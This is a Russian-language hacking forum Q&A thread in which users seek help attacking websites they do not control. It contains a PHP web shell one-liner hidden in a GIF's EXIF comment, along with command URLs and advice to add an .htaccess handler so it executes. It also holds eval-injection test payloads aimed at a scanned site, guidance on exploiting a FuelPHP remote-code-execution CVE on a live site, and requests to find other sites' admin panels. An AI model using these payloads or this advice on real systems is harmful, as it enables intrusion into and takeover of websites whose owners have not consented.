[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. aldemko

    aldemko Member

    Joined:
    7 Sep 2015
    Messages:
    36
    Likes Received:
    6
    Reputations:
    0
    здесь бывает нарисовано
    http://www.site.ru/bitrix/admin/index.php
    1С-Битрикс: Управление сайтом 10.0.1. © 2002 Битрикс, 2007 1С-Битрикс
    или примерно можно определить по году релиза
    Битрикс: Управление сайтом. © 2002-2006 Битрикс
    или (в некоторых случаях) - http://www.site.ru/bitrix/updates/updater.log (только это в очень старых версиях - сейчас то и папки такой нет )

    если есть доступ к админке - то в разделе обновления
     
  2. Dr.Silent

    Dr.Silent New Member

    Joined:
    24 May 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Всем привет, возможно я покажусь клоуном, но хотелось бы услышать ответ от опытных юзеров.
    С чего начать свой путь?
    Да я могу сливать бд через sql dumper, но хочется развиваться, я уверен есть много тем на форуме, чтобы начать с азов. К примеру тему о заливке шелла и прочее, то есть именно где можно почитать и вникнуть, заранее спасибо :)
     
  3. Jopashnik

    Jopashnik New Member

    Joined:
    27 Oct 2010
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0
    Помогите плз, есть сайт на нем я думаю есть софт. Нужна ссылка на софт, есть два сайта, один , на втором есть зипы, но не тот софт что нужен. Нужен ause, помогите плз
     
    #563 Jopashnik, 26 Feb 2016
    Last edited: 28 Feb 2016
  4. AppS

    AppS Member

    Joined:
    8 Aug 2009
    Messages:
    249
    Likes Received:
    25
    Reputations:
    6
    Если ты ищешь на сайте ausee.ru/main, то его там нету, там ведут ссылки на 2 сайт, I-tt.ru
    hxxp://ausee.ru/url/hxxp://www.i-tt.ru/soft/ause.html
    А по ссылки
    hxxp://www.i-tt.ru/soft/ause.html

    Часто задаваемые вопросы по роботу AuSe есть ссылка

    hxxp://www.i-tt.ru//soft/AuSe/HELP_AuSe.pdf

    И в завершении качай

    Code:
    hxxp://www.i-tt.ru/soft/AuSe/AuSe.zip
     
  5. Jopashnik

    Jopashnik New Member

    Joined:
    27 Oct 2010
    Messages:
    9
    Likes Received:
    4
    Reputations:
    0

    Спс!! Я люблю тебя ;) Вот не поверишь смотрел я в этой папке файл, затупил и все мелкими буквами написал..
     
  6. kiyuni

    kiyuni New Member

    Joined:
    10 Dec 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите, как залить шелл через exif. Почитал несколько статей, сделал gif картинку с кодом в комментарии
    PHP:
    <?php eval($_GET[cmd]); ?>
    Теперь вопрос, как залить нормальный шелл?
    phpinfo при помощи запроса http://site.com/shell-image.gif?cmd=phpinfo(); не показывается
    Попробовал на своем хостинге промутить, тоже ничего не получилось.
     
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Пожалуйста, попробуйте сделать так

    http://site.com/shell-image.gif?cmd=ls or http://site.com/shell-image.gif?cmd=whoami если ничего не выполняется возможно вы забыли про Эйчтиассес
     
  8. kiyuni

    kiyuni New Member

    Joined:
    10 Dec 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Ничего не выводится, все также открывается просто картинка
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Так посмотрите , вы картинку залили , возможно с кодом, но она обрабатывается как картинка, код не обрабатывается
     
    kiyuni likes this.
  10. [XOR]

    [XOR] New Member

    Joined:
    24 Jul 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Помогите разобраться. Просканировал сайт сканером w3af-ом он выдал следующее:
    Code:
    eval() input injection was found at: "http://site.com/index.php", using HTTP method
    POST. The sent data was: "app=core&module=search&do=search&fromMainBar=1" The modified
    parameter was "do". This vulnerability was found in the requests with ids 10511, 10569,
    10651, 10734 and 10837.
    
    eval() input injection was found at:
    "http://site.com/index.php?app=core&module=search&do=search&fromMainBar=1", using
    HTTP method POST. The sent post-data was:
    "...usedInJsLater=aHR0cDovL21ldHJvbG9ndS5ydS9pbmRleC5waHA/YXBwPWNvcmU..." which
    modifies the "usedInJsLater" parameter. This vulnerability was found in the requests
    with ids 10510, 10580, 10654, 10760 and 10873.
    
    Это ложное срабатывание? Как проверить? Пробовал так do=phpinfo() но ничего не выводит.
     
  11. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Возможно, . w3af бывает чудит, однако лучше ручкаи проверить
     
  12. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    может что то такое проканает
    do=echo "test";exit;//
    do=;echo "test";exit;//
    do= && echo "test";exit;//
    etc

    в урл энкод только надо обернуть
    phpinfo в редких случаях может быть например отключена
     
    _________________________
  13. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    ну если бы гифки выполнялись как пхп это было бы ммм ^_^
    как проверить выполняется код или нет? скачай свою гифку с сайта, открой в блокноте, видишь пхп код? если да значит он стопудово не выполнился, если не видишь - значит он либо выполнился, либо порезался на этапе загрузки
    по дефолту конечно он выполнятся не будет, вообще в большинстве случаев запрос даже не дойдет до апача->пыхи, картинку отдаст nginx( который сейчас используется почти везде )
    даже если запрос дойдет таки до апача, оный должен понять как обработать файл, для это есть хендлеры, в манах есть примеры
    https://httpd.apache.org/docs/2.2/ru/handler.html
    как правильно сказал BabaDook нужно подредактировать .htaccess, добавив хендлер для своего шелла
     
    _________________________
    kiyuni likes this.
  14. user6334

    user6334 Member

    Joined:
    29 Jun 2015
    Messages:
    296
    Likes Received:
    17
    Reputations:
    12
    Подскажите, тут кто-нибудь писал про уязвимости Ruby on rails?
     
  15. drveb

    drveb Member

    Joined:
    21 Jul 2011
    Messages:
    14
    Likes Received:
    8
    Reputations:
    0
    Вопрос такой - Можно ли в код яндекс метрики спрятать шелл?
     
  16. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    28
    Likes Received:
    1
    Reputations:
    0
    Подскажите по движку typo3 (версия TYPO3 4.5 CMS). В базе есть таблицы be_users и fe_users, но логины и пароли к админке (cайт/typo3/index.php) не подходят. Кто знаком с typo3 подскажите!
     
    #576 blackhead, 2 Apr 2016
    Last edited: 2 Apr 2016
  17. adamabakumov

    adamabakumov New Member

    Joined:
    5 Apr 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Есть сайт на немного странном php фреймворке fuelPHP. Сайт онлайн, доступа нету. Нашел такие уязвимости http://fuelphp.com/security-advisories и http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1999. Звучит так "The auto-format feature in the Request_Curl class in FuelPHP 1.1 through 1.7.1 allows remote attackers to execute arbitrary code via a crafted response." Как проверить имеет ли сайт уязвимость (актуальна ли версия фреймворка). Где можно почитать про эксплуатацию подобного рода уязвимостей?
     
  18. pas9x

    pas9x Elder - Старейшина

    Joined:
    13 Oct 2012
    Messages:
    423
    Likes Received:
    585
    Reputations:
    52
    Для эксплуатации уязвимости нужно знать пхп. Если ты его не знаешь или не имеешь опыта создания сайтов на пхп то использовать уязвимость не получится. Если знаешь то нужно скачать уязвимую верси fuelphp, открыть исходники, на локалхосте изучить уязвимость и опробовать её. Дальше имея опыт эксплуатации уязвимости в лабораторных условиях можешь сделать попытку эксплуатации на рабочем сайте. И если будет успех то вообще можешь эксплоит для этой уязвимости сделать и будешь крут.
     
  19. adamabakumov

    adamabakumov New Member

    Joined:
    5 Apr 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    PHP знаю, но с данным фреймворком не работал. Вот времени правда мало. Можно ли узнать версию фреймворка? Что можно почитать по теме?
     
  20. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Необходима помощь в поиске адмнки - aeuso.org.